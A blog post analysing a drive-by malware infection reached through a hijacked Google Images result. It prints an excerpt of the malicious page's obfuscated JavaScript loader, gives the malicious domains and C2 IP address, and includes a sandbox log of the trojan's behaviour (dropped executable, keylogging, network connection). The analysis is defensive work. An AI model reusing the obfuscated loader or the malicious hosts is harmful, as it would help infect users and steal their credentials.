Google Images redirects to a new virus

I wrote in the past an article about how a simple Google Image search is hijacked and lead to a fake antivirus. That fake antivirus, Windows Security was an obfuscated Java Script running in the browser and imitating the Windows Explorer but it was not able to do any harms other than irritating the users with repeated fake alerts pop-ups. Of course the solution to solve these false computer infections is offered and this is to download and install another rogue program AntiSpyWareSetup.exe.

You don’t need a lot of online experience to realize that by installing the rogue software  your system will be infected for real and maybe compromised because once a trojan virus is inside the operating system it will open the “gates” for another myriad of viruses. However multiple steps are involved until the computer of an innocent user will become infected: he must click “Remove all infections” button–this button is a kind of download link, he must download the rogue program described above and he must install it. Unless this innocent user is a child, I think nobody can falls into this trap.

But yesterday somebody told me about another Google Images search that can lead to a computer infection without user intervention: simply clicking on an image in the first Google Image results page, the user is redirected to a malware domain where a Java executable is automatically downloaded and executed, a specific drive-by attack. This new trojan virus seems to be a much more serious problem, as it seems to be interested by the browser saved passwords and once it is installed in the computer, immediately it connects to an IP address.

Let’s start with the beginning. Yesterday, who was searching in Google Image for Presley Walker pics and click the first image from the results was redirected and automatically infected if not the proper defense software was in place.

The whole URL taken from the browser address bar was :

http://www.google.fi/imgres?imgurl=http://media1.englishbaby.com/dynamic/my_photo/image/0000/0000/0582/582849_1207016226_560070.jpg&imgrefurl=http://meble-zach.laohost.net/presley-walker%26page%3D2&usg=__i5h8m160Hg_MBAENC0bFErNk8Ic=&h=400&w=324&sz=27&hl=fi&start=1&zoom=1&tbnid

=xVO3e4u_qm5S-M:&tbnh=124&tbnw=100&ei=pSyqTZScOpKq8APi0YC5Ag&prev=/search%3Fq%3DPresley%2BWalker%26hl%3Dfi%26client%3Daff-cs-worldbrowser%26hs%3DcYv%26sa%3DX%26biw%3D1924%26bih%3D838%26tbm%3Disch%26prmd%3Divns&itbs=1

redirecting to:

http://likestop.info/TF19

which is the malicious domain containing the malware.

Fortunately, today this Google Image search is not hijacked anymore the redirect  does not act anymore because Google repair the things, but the virus is still present at the mentioned URL.

An excerpt of the source of the web page at  http://likestop.info/TF19 is below. It’s in fact a blank page sometimes showing a little square but with a Java Script running in the background. It looks like a truly black hat:

<html lang=”en” dir=”ltr”>
<head>

<meta name=”description” content=”Careers: Take your career to new heights with little help from the experts. From getting ahead, to honing effective work habits, to getting along better with your boss, our career.” />

<meta name=”category” scheme=”DMINSTR2″ content=”Careers &amp; Work” />
<meta name=”pagetype” scheme=”DMINSTR2″ content=”category” />
<meta name=”wa_lr” scheme=”DMINSTR2″ content=”en-US” />
<meta name=”studioid” scheme=”DMINSTR2″ content=”” />
<meta name=”contentid” scheme=”DMINSTR2″ content=”” />
<meta name=”subcategory” scheme=”DMINSTR2″ content=”” />

<meta name=”subsubcat” scheme=”DMINSTR2″ content=”” />
<meta name=”siteid” scheme=”DMINSTR2″ content=”EHWC” />
<meta name=”exp_name” scheme=”DMINSTR2″ content=”Rebuild” />
<meta name=”exp_page” scheme=”DMINSTR2″ content=”Rebuild-TestGroup” />
<meta name=”wa_un” scheme=”DMINSTR2″ content=”” />

<meta name=”wa_isreg” scheme=”DMINSTR2″ content=”” />
<meta name=”wa_lgdin” scheme=”DMINSTR2″ content=”” />
<meta name=”wa_clvl” scheme=”DMINSTR2″ content=”1″ />
<meta name=”wa_lgsrc” scheme=”DMINSTR2″ content=”1″ />

<meta name=”description” content=”7+ GB of storage, less spam, and mobile access. Gmail is email that’s intuitive, efficient, and useful. And maybe even fun.”>
ico” href=”//mail.google.com/favicon.ico”>
<style type=text/css>
body,td,div,p,a,font,span {font-family: arial,sans-serif}
body {margin:1em 0;}
h1 { font-size:1.3em; font-weight:normal; margin:0 0 0.4em; }
.intro { margin:0 1em 0.5em 0 }
.c {width: 4; height: 0}
.footer { text-align:center; margin:1em 0 }

.tl {padding: 0; width: 4; text-align: left; vertical-align: top}
.tr {padding: 0; width: 4; text-align: right; vertical-align: top}
.bl {padding: 0; width: 4; text-align: left; vertical-align: bottom}
.br {padding: 0; width: 4; text-align: right; vertical-align: bottom}

.caption {color:#000000; white-space:nowrap; background:#E8EEFA; text-align:center}
.form-noindent {background-color: #ffffff; border: #C3D9FF 1px solid}
.feature-image {padding: 15px 0 0 0; width:48px; vertical-align: top; text-align: right; }
.feature-description {padding: 20px 0 0 10px; vertical-align: top; text-align: left; }
.signup_btn {cursor: pointer; margin: 10px 0 -20px 0; text-align: center; }
.signup_btn_link {color: #000; text-align: center; text-align: center; text-decoration: none; padding: 0 7px; font-weight: bold; font-size: 14px; white-space: nowrap; }

</style>
<title>
Gmail: Email from Google
</title>
<style type=”text/css”>
body { font-size: smaller; }
</style>
<meta name=”description” content=”High-end mechanical keyboard providing outstanding tactile feedback. If you like the , is for you. Pure typing joy defined.”/>
programer keyboard, geek keyboard, high quality keyboard, cherry, mx module, mx keys switch, mx blue key switch, mx brown key swith, mx black key switche, clicky keyboard, geek elite high quality pc keyboard, mechanical keyswitch, mechanical key switch, clicky keyboard, quality, USB, geek, tactile keyboard, geek gift, geek chic, nerd gift” />
<script>
try {
window.moniker = function(s){};

}
catch (e) {

}
function inte()
{
Call();
}

xm_ahvoei_=dmocbakawj;var sb$fslxcos=””;var f$hquvn8f_=’1′;var cdjdq4ukd_=’charAt’;var ml0q3mxtom=’length’;var d2qsjrnhyk=’abcdefghijkmnopqrstuvwxyzABCDEFGHJKLMNPRST’;var yqaabr5zvl=’roxioa_is’;var iwi_itam7k=’getElementById’;var vcswsdxstu=255;var bx$yj9$qne=256;var s$f6d9galv=4;var f1zf7s4y9o=5;var kxfj888i0w=20;var ja7wbjzpx2=65280;z8nd16f_jl=(function(e22$dib2dy,kvfu0pbrmi){return e22$dib2dy[kvfu0pbrmi];});var uz$alispdu=bx$yj9$qne;var x4rg4cofy0=100;var xn$zidhnq8=8;var fs3cxxd_lw=s$f6d9galv;var bgsciwrjjw=f1zf7s4y9o;var ak2alag120=0;var wxdoqs$0b9=1;var uq119ea145=4000;var dg$xhobxn1=kxfj888i0w;var fsk_dwkhvx=ja7wbjzpx2;function dmocbakawj(){var ll52d8ex_4=parseInt(k5gst7fbh$(‘roxioa_sk’));var damdm90hya=sb$fslxcos;for(var part=-x4rg4cofy0;partuq119ea145){isk=wxdoqs$0b9}}return ss;}function decodeHex(str){var result=[];var nextchar=sb$fslxcos;for(var i=ak2alag120;i>xn$zidhnq8;c2=code&vcswsdxstu;result[‘push’](String.fromCharCode(c1,c2));nextchar=sb$fslxcos}}return result[‘join’](sb$fslxcos);}function ipau2lhdtv(r5wbf2legb){return document[iwi_itam7k](r5wbf2legb);}function base_decode(num,alphabet){alphabet=d2qsjrnhyk;var len=num.length;var decoded=ak2alag120;var multi=wxdoqs$0b9;for(var i=len- wxdoqs$0b9;i>=ak2alag120;i– ){decoded=decoded+multi*alphabet.indexOf(num[cdjdq4ukd_](i));multi=multi*alphabet[ml0q3mxtom]}return decoded;}function k5gst7fbh$(i9$dq66uq_){return i4oy29bj_j(ipau2lhdtv(i9$dq66uq_),wecrta73a4);}
try{
document.stupid();
}
catch(e){
}

</script>
</head>

I have navigated to this malicious site using a sandboxed browser(Firefox running inside Sandboxie) and I was able to track the changes to the system performed by this drive-by attack, them are presented below.

As a warning, please keep in mind that even if you run the browser or another trojan virus in a sandbox, it still can connect to the hackers servers and send the stolen data so if you are not careful enough you will finish with the computer clean of viruses because of the sandbox but with online accounts stolen, it’s not a happy end for you.

[ Changes to filesystem ]
* Modifies file C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\cookies.sqlite
* Creates file C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\cookies.sqlite-journal
* Modifies file C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\localstore.rdf
* Modifies file C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\places.sqlite
* Modifies file C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\pluginreg.dat
* Modifies file C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\prefs.js
* Creates file C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\sessionstore.js
* Creates file C:\Documents and Settings\Administrator\Application Data\Sun\Java\Deployment\cache\6.0\17\7560f91-16655272
* Creates file C:\Documents and Settings\Administrator\Application Data\Sun\Java\Deployment\cache\6.0\17\7560f91-16655272.idx
* Creates file C:\Documents and Settings\Administrator\Application Data\Sun\Java\Deployment\cache\6.0\42\3bbc156a-3d1d62b5
* Creates file C:\Documents and Settings\Administrator\Application Data\Sun\Java\Deployment\cache\6.0\42\3bbc156a-3d1d62b5.idx
* Modifies file C:\Documents and Settings\Administrator\Application Data\Sun\Java\Deployment\deployment.properties
* Modifies file C:\Documents and Settings\Administrator\Local Settings\Application Data\Mozilla\Firefox\Mozilla Firefox\updates\0\update.mar
* Creates file C:\Documents and Settings\Administrator\Local Settings\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\Cache\915F59E7d01
* Modifies file C:\Documents and Settings\Administrator\Local Settings\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\Cache\_CACHE_001_
* Modifies file C:\Documents and Settings\Administrator\Local Settings\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\Cache\_CACHE_002_
* Modifies file C:\Documents and Settings\Administrator\Local Settings\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\Cache\_CACHE_MAP_
* Modifies file C:\Documents and Settings\Administrator\Local Settings\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\XUL.mfl
* Modifies file C:\Documents and Settings\Administrator\Local Settings\Temp\afurladvisor.log
* Creates file C:\Documents and Settings\Administrator\Local Settings\Temp\v1wd1flc.exe

[ Changes to registry ]
* Deletes Registry key HKEY_LOCAL_MACHINE\software\Classes\clsid\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}
* Modifies value “Name=java.exe” in key HKEY_CURRENT_USER\software\Microsoft\Direct3D\MostRecentApplication
old value “Name=FLVPlayer.exe”
* Deletes Registry key HKEY_CURRENT_USER\software\classes\*\shell\sandbox

[ Network services ]
* Connects to “66.235.180.91” on port 80.

[ Process/window information ]
* Keylogger functionality.
* Creates a mutex “MSCTF.Shared.MUTEX.IPB”.
* Creates an event named “MSCTF.SendReceive.Event.IPB.IC”.
* Creates an event named “MSCTF.SendReceiveConection.Event.IPB.IC”.
* Creates a mutex “jvmStart”.
* Opens a service named “JavaQuickStarterService”.
* Creates process “(null),”C:\Program Files\Java\jre6\bin\java.exe” -D__jvm_launched=109833283237 -Xbootclasspath/a:C:\PROGRA~1\Java\jre6\lib\deploy.jar;C:\PROGRA~1\Java\jre6\lib\javaws.jar;C:\PROGRA~1\Java\jre6\lib\plugin.jar -Djava.class.path=C:\PROGRA~1\Java\jre6\classes -Dsun.awt.warmup=true sun.plugin2.main.client.PluginMain write_pipe_name=jpi2_pid3260_pipe2,read_pipe_name=jpi2_pid3260_pipe1,(null)”.
* Creates a mutex “CTF.LBES.MutexDefaultS-1-5-21-839522115-261903793-1417001333-500”.
* Creates a mutex “CTF.Compart.MutexDefaultS-1-5-21-839522115-261903793-1417001333-500”.
* Creates a mutex “CTF.Asm.MutexDefaultS-1-5-21-839522115-261903793-1417001333-500”.
* Creates a mutex “CTF.Layouts.MutexDefaultS-1-5-21-839522115-261903793-1417001333-500”.
* Creates a mutex “CTF.TMD.MutexDefaultS-1-5-21-839522115-261903793-1417001333-500”.
* Creates a mutex “CTF.TimListCache.FMPDefaultS-1-5-21-839522115-261903793-1417001333-500MUTEX.Default

S-1-5-21-839522115-261903793-1417001333-500”.
* Creates a mutex “DDrawWindowListMutex”.
* Creates a mutex “__DDrawExclMode__”.
* Creates a mutex “__DDrawCheckExclMode__”.
* Creates an event named “jpi2_pid3260_evt3”.
* Creates process “(null),C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\v1wd1flc.exe,(null)“.

Just by involuntary visiting this website, a malware is dropped in the temporary %temp% directory but an interesting fact, visiting the site twice, the name and the MD5 hash of the malware is slightly modified, though the size is the same 7.62 KB. In the first case it was :

1dk8pu5p.exe   MD5:  C438EF1371451CC4CE47CE854595FABC

and at the second visit:

v1wd1flc.exe     MD5: FC2580B1FC0152785513ECC6B99C9461

These random names and the modified MD5 hashes makes more difficult the antivirus task to recognize this virus trojan. Performing a scan at virustotal.com results that only 5 from 41 antiviruses detect this virus and two of them only as suspicious, it has not yet a name, that’s why I called it the TF19 virus. Another fact, this virus tries to make a connection over the Internet and transfer the Firefox Profile folder where are stored all the saved passwords, the history of navigation and other kind of sensitive data. The chances are good that also more malware will be downloaded onto the computer, resulting a keylogged computer found at the discretion of the hacker–a zombie computer.

Also we can see from the Sandboxie analysis (performed with BSA add-on) that the virus uses Java engine to do his nefarious actions.

From curiosity, I had performed a Google search for TF19 trojan virus and it came up with a virustotal.com report for another  TF19 domain:

http://bluewiki.info/TF19

The virustotal.com sentence for this site was 100% clean site , despite the user comments from the scan result page that fired an warning about a virus infection resulted from visiting the address mentioned.

The same  100% clean site is the report for our analyzed site: http://likestop.info/TF19 . Very, very bad for the users.

Another result of a Google search for TF19 virus is at Dr.Web Anti-virus site, there a connection is made with a trojan virus named by Avira TR/Spy.Bancos.TF.19 used by hackers to steal online banking accounts, emails accounts and other sensitive data aswell.

It’s a good thing that Google react very quickly to these kind of threats but the mode how this virus finds its way to infect our computers without user interaction, just by clicking an image remind us how important is to run a reputed Internet Security Suite always up-to-date. Even so, we have no guarantee that we will stay clean of viruses but that is all what depends of us: to update our antivirus and the operating system with the latest security patches.

Hmmm, seeing infection methods like this one, I hate to say it but we need also a bit of luck to avoid an infection.

Keep safe !

Posted in Thoughts.

7 Responses

Leave a Reply